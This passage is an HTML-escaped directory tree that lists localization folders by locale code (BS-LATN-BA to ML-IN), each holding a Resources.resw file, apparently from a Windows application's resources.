&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BS-LATN-BA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CA-ES
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CA-ES-VALENCIA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CS-CZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CY-GB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; DA-DK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; DE-DE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; EL-GR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; EN-GB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; en-US
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ES-ES
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ES-MX
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ET-EE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; EU-ES
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FA-IR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FI-FI
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FIL-PH
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FR-CA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fr-FR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; GA-IE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; GD-GB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; GL-ES
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; GU-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HE-IL
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HI-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HR-HR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HU-HU
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HY-AM
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ID-ID
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; IS-IS
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; IT-IT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ja-JP
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KA-GE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KK-KZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KM-KH
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KN-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KOK-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; KO-KR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LB-LU
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LO-LA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LT-LT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LV-LV
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MI-NZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MK-MK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ML-IN
